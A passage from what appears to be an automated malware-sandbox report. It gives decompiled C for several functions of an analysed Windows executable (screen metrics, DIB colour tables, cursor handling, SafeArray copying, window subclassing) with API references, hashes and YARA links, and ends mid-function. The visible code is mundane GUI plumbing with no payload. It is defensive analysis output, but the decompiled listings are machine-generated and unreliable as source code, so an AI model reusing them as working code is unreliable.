                                                                        • Instruction Fuzzy Hash: 0411E731704B215FD3208F75AC48B67B7A9EF06324F50853FED46A7651D374A8008B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004276F0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 47%
                                                                        			E004276F0(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496aca != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x496ab4; // 0x4276f0
					 *0x496ab4 = E00427218(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x496ab4(_t27, _t29);
				}
				return _t24;
			}














                                                                        0x004276f9
                                                                        0x004276fc
                                                                        0x00427706
                                                                        0x0042772b
                                                                        0x00427733
                                                                        0x00427753
                                                                        0x00427758
                                                                        0x00427763
                                                                        0x0042776e
                                                                        0x00427778
                                                                        0x00427779
                                                                        0x0042777a
                                                                        0x0042777b
                                                                        0x0042777c
                                                                        0x0042777d
                                                                        0x00427787
                                                                        0x00427789
                                                                        0x00427791
                                                                        0x00427792
                                                                        0x00427792
                                                                        0x00427797
                                                                        0x00427797
                                                                        0x00427708
                                                                        0x0042770d
                                                                        0x0042771a
                                                                        0x00427727
                                                                        0x00427727
                                                                        0x004277a1

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427748
                                                                        • GetSystemMetrics.USER32 ref: 0042775D
                                                                        • GetSystemMetrics.USER32 ref: 00427768
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 00427792
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoW
                                                                        • API String ID: 2545840971-2774842281
                                                                        • Opcode ID: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction ID: 831a537686c86f16d1a85402d57f1e65c448198929f9e699794ec6438de5e3da
                                                                        • Opcode Fuzzy Hash: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction Fuzzy Hash: AC11E4717057119FD3209F60AC407A7B7E8EB86314F40853BED49A7251D274B8008BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004238F0, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E004238F0(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E004212BC(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L5;
					} else {
						_push(0);
						L00406EB4();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406AE4();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x42399f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x4239a6);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407124();
						return _t31;
					}
				}
			}

















                                                                        0x004238f0
                                                                        0x004238f1
                                                                        0x004238f3
                                                                        0x004238fb
                                                                        0x004238fe
                                                                        0x00423902
                                                                        0x004239a6
                                                                        0x004239ab
                                                                        0x00423913
                                                                        0x00423921
                                                                        0x00423926
                                                                        0x0042392a
                                                                        0x00000000
                                                                        0x0042392c
                                                                        0x0042392c
                                                                        0x0042392e
                                                                        0x00423933
                                                                        0x00423936
                                                                        0x00423939
                                                                        0x0042393a
                                                                        0x0042393f
                                                                        0x0042394c
                                                                        0x00423951
                                                                        0x00423952
                                                                        0x00423957
                                                                        0x0042395a
                                                                        0x0042396b
                                                                        0x00423972
                                                                        0x00423975
                                                                        0x00423978
                                                                        0x00423985
                                                                        0x0042398e
                                                                        0x00423993
                                                                        0x00423996
                                                                        0x00423997
                                                                        0x00423999
                                                                        0x0042399e
                                                                        0x0042399e
                                                                        0x0042392a

                                                                        APIs
                                                                          • Part of subcall function 004212BC: GetObjectA.GDI32(00000000,00000004), ref: 004212D3
                                                                          • Part of subcall function 004212BC: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,00423BFA,00000000,00423D50,?,00000000), ref: 004212F6
                                                                        • 72E7AC50.USER32(00000000), ref: 0042392E
                                                                        • 72E7A590.GDI32(?,00000000), ref: 0042393A
                                                                        • SelectObject.GDI32(?), ref: 00423947
                                                                        • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0042399F,?,?,?,?,00000000), ref: 0042396B
                                                                        • SelectObject.GDI32(?,?), ref: 00423985
                                                                        • DeleteDC.GDI32(?), ref: 0042398E
                                                                        • 72E7B380.USER32(00000000,?,?,?,?,004239A6,?,00000000,0042399F,?,?,?,?,00000000), ref: 00423999
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$Select$A590B380ColorDeleteTable
                                                                        • String ID:
                                                                        • API String ID: 980243606-0
                                                                        • Opcode ID: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction ID: 2b4ad22b928df6106159cc93f20210c2255a60c226f768308a27e69030d134a8
                                                                        • Opcode Fuzzy Hash: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction Fuzzy Hash: 1B1154B1E042196BDB10EFE9DC41EAEB3FCEB09304F4145AAB514E7381D6789E508759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004546C4, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E004546C4(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E0045469C(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00407298(SendMessageA(_t27, 0x84, 0, E00407328(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                        0x004546c4
                                                                        0x004546c4
                                                                        0x004546c8
                                                                        0x004546cb
                                                                        0x004546cd
                                                                        0x004546d3
                                                                        0x00454748
                                                                        0x00454748
                                                                        0x004546d5
                                                                        0x004546d5
                                                                        0x004546dc
                                                                        0x00454738
                                                                        0x00454743
                                                                        0x00000000
                                                                        0x004546de
                                                                        0x004546df
                                                                        0x004546e4
                                                                        0x004546f1
                                                                        0x004546f5
                                                                        0x00000000
                                                                        0x004546f7
                                                                        0x004546fa
                                                                        0x00454708
                                                                        0x00000000
                                                                        0x0045470a
                                                                        0x00454731
                                                                        0x00454731
                                                                        0x00454708
                                                                        0x004546f5
                                                                        0x004546dc
                                                                        0x00454751

                                                                        APIs
                                                                        • GetCursorPos.USER32 ref: 004546DF
                                                                        • WindowFromPoint.USER32(?,?), ref: 004546EC
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004546FA
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454701
                                                                        • SendMessageA.USER32 ref: 0045471A
                                                                        • SendMessageA.USER32 ref: 00454731
                                                                        • SetCursor.USER32(00000000), ref: 00454743
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                        • String ID:
                                                                        • API String ID: 1770779139-0
                                                                        • Opcode ID: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction ID: a4fd025c39cd02020c09f08377d953acec842c109d22c87e699394f9229cea46
                                                                        • Opcode Fuzzy Hash: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction Fuzzy Hash: 2201B12664430025D62036764C86F7F25A88BDAB5AF11007FB904BE2C3EA3E9C45526E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040C430, Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0040C430(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C12C();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C154();
						if(_t76 != 0) {
							E004028B0(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C15C();
						if(_t79 != 0) {
							E004028B0(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C144();
				_t107 = _t49;
				if(_t107 == 0) {
					E004028B0(0x12);
				}
				E0040C2F0(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C174();
				if(_t56 != 0) {
					E004028B0(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C174();
				if(_t58 != 0) {
					E004028B0(0x14);
				}
				_v780();
				_t64 = E0040C3D4(_v788 - 1, _t109);
			}
































                                                                        0x0040c43c
                                                                        0x0040c442
                                                                        0x0040c448
                                                                        0x0040c44d
                                                                        0x0040c456
                                                                        0x0040c458
                                                                        0x0040c459
                                                                        0x0040c45f
                                                                        0x0040c460
                                                                        0x00000000
                                                                        0x0040c460
                                                                        0x0040c46d
                                                                        0x0040c47f
                                                                        0x0040c46f
                                                                        0x0040c474
                                                                        0x0040c474
                                                                        0x0040c48e
                                                                        0x0040c49a
                                                                        0x0040c49d
                                                                        0x0040c49f
                                                                        0x0040c4a0
                                                                        0x0040c4a2
                                                                        0x0040c4a8
                                                                        0x0040c4aa
                                                                        0x0040c4b9
                                                                        0x0040c4ba
                                                                        0x0040c4be
                                                                        0x0040c4c4
                                                                        0x0040c4c5
                                                                        0x0040c4cc
                                                                        0x0040c4d0
                                                                        0x0040c4d0
                                                                        0x0040c4db
                                                                        0x0040c4dc
                                                                        0x0040c4e0
                                                                        0x0040c4e6
                                                                        0x0040c4e7
                                                                        0x0040c4ee
                                                                        0x0040c4f2
                                                                        0x0040c4f2
                                                                        0x0040c50d
                                                                        0x0040c50f
                                                                        0x0040c510
                                                                        0x0040c513
                                                                        0x0040c513
                                                                        0x0040c4a8
                                                                        0x0040c51c
                                                                        0x0040c51d
                                                                        0x0040c523
                                                                        0x0040c524
                                                                        0x0040c526
                                                                        0x0040c52b
                                                                        0x0040c52f
                                                                        0x0040c533
                                                                        0x0040c533
                                                                        0x0040c53e
                                                                        0x0040c549
                                                                        0x0040c554
                                                                        0x0040c55d
                                                                        0x0040c560
                                                                        0x0040c562
                                                                        0x0040c563
                                                                        0x0040c569
                                                                        0x0040c56f
                                                                        0x0040c571
                                                                        0x0040c573
                                                                        0x0040c576
                                                                        0x0040c579
                                                                        0x0040c579
                                                                        0x0040c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c5ec
                                                                        0x0040c5ec
                                                                        0x0040c57c
                                                                        0x0040c582
                                                                        0x0040c589
                                                                        0x0040c58a
                                                                        0x0040c590
                                                                        0x0040c591
                                                                        0x0040c598
                                                                        0x0040c59c
                                                                        0x0040c59c
                                                                        0x0040c5a7
                                                                        0x0040c5a8
                                                                        0x0040c5ae
                                                                        0x0040c5af
                                                                        0x0040c5b0
                                                                        0x0040c5b7
                                                                        0x0040c5bb
                                                                        0x0040c5bb
                                                                        0x0040c5ce
                                                                        0x0040c5dc

                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(?), ref: 0040C460
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4C5
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4E7
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C526
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C591
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C5B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction ID: 91eb53b407ec2d2dd2796e8a100e52e0f4196e31d9e17e27235ea4b964657383
                                                                        • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction Fuzzy Hash: 7851EF75901529DBDB22DB59CD90ADAB3BCBF48304F0042FAE509E7352D674AF818F64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421568, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00421568(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004083E8(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x42185f, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00406EB4();
				_v44 = _t36;
				if(_v44 == 0) {
					E00420A2C(_t51);
				}
				_push(_t68);
				_push(0x421651);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406B8C();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406B8C();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E00421658);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407124();
				return _t43;
			}






















                                                                        0x00421569
                                                                        0x0042156b
                                                                        0x00421571
                                                                        0x00421574
                                                                        0x00421577
                                                                        0x0042157a
                                                                        0x00421583
                                                                        0x0042158e
                                                                        0x0042159c
                                                                        0x004215a2
                                                                        0x004215aa
                                                                        0x004215b2
                                                                        0x004215cf
                                                                        0x004215d4
                                                                        0x004215d9
                                                                        0x004215b4
                                                                        0x004215be
                                                                        0x004215c2
                                                                        0x004215ca
                                                                        0x004215ca
                                                                        0x004215dc
                                                                        0x004215de
                                                                        0x004215e3
                                                                        0x004215ea
                                                                        0x004215ec
                                                                        0x004215ec
                                                                        0x004215f3
                                                                        0x004215f4
                                                                        0x004215f9
                                                                        0x004215fc
                                                                        0x004215ff
                                                                        0x00421601
                                                                        0x00421604
                                                                        0x00421605
                                                                        0x0042160c
                                                                        0x0042160e
                                                                        0x00421611
                                                                        0x00421612
                                                                        0x0042161b
                                                                        0x00421621
                                                                        0x00421633
                                                                        0x00421635
                                                                        0x00421623
                                                                        0x00421623
                                                                        0x00421623
                                                                        0x0042163a
                                                                        0x0042163d
                                                                        0x00421640
                                                                        0x00421645
                                                                        0x00421648
                                                                        0x00421649
                                                                        0x0042164b
                                                                        0x00421650

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004215B6
                                                                        • GetSystemMetrics.USER32 ref: 004215C2
                                                                        • 72E7AC50.USER32(00000000), ref: 004215DE
                                                                        • 72E7AD70.GDI32(00000000,0000000E,00000000,00421651,?,00000000), ref: 00421605
                                                                        • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00421651,?,00000000), ref: 00421612
                                                                        • 72E7B380.USER32(00000000,00000000,00421658,0000000E,00000000,00421651,?,00000000), ref: 0042164B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$B380
                                                                        • String ID:
                                                                        • API String ID: 3145338429-0
                                                                        • Opcode ID: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction ID: 1df3673ef4671481c0cb97d4e5fb4c97dc3887fd9bb6d5ee2f2f7d792188f36b
                                                                        • Opcode Fuzzy Hash: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction Fuzzy Hash: F2317374B00218EFDB00DF65C881AAEBBF5FB89710F50816AF915AB395C6389D41CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004219D8, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 45%
                                                                        			E004219D8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00421888(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00406AE4();
				_v16 = 0;
				_push(_t46);
				_push(0x421a75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00406C5C();
					_v12 = _t29;
					_push(_v16);
					L00406C2C();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00421A7C);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00406C5C();
				}
				return DeleteDC(_v16);
			}











                                                                        0x004219e1
                                                                        0x004219e5
                                                                        0x004219ee
                                                                        0x004219f5
                                                                        0x004219f8
                                                                        0x004219fa
                                                                        0x004219ff
                                                                        0x00421a04
                                                                        0x00421a05
                                                                        0x00421a0a
                                                                        0x00421a0d
                                                                        0x00421a12
                                                                        0x00421a14
                                                                        0x00421a16
                                                                        0x00421a17
                                                                        0x00421a1a
                                                                        0x00421a1b
                                                                        0x00421a20
                                                                        0x00421a26
                                                                        0x00421a27
                                                                        0x00421a27
                                                                        0x00421a45
                                                                        0x00421a4b
                                                                        0x00421a4e
                                                                        0x00421a51
                                                                        0x00421a5a
                                                                        0x00421a5c
                                                                        0x00421a61
                                                                        0x00421a65
                                                                        0x00421a66
                                                                        0x00421a66
                                                                        0x00421a74

                                                                        APIs
                                                                          • Part of subcall function 00421888: GetObjectA.GDI32(?,00000054), ref: 0042189C
                                                                        • 72E7A590.GDI32(00000000), ref: 004219FA
                                                                        • 72E7B410.GDI32(?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A1B
                                                                        • 72E7B150.GDI32(?,?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A27
                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A3E
                                                                        • 72E7B410.GDI32(?,00000000,00000000,00421A7C,00000000,?,?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A66
                                                                        • DeleteDC.GDI32(?), ref: 00421A6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B410$A590B150BitsDeleteObject
                                                                        • String ID:
                                                                        • API String ID: 3837315262-0
                                                                        • Opcode ID: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction ID: 8d8527e8f488405aff4f669bab89b73bcf596afed52ccf13c67bd5abc98d74bf
                                                                        • Opcode Fuzzy Hash: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction Fuzzy Hash: 7B118275B042147FDB10EBA9CC41F5EBBFCEB4C700F51846AB918E7291D6789900C768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004333D8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004333D8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x47a8ac; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x47a8ac; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
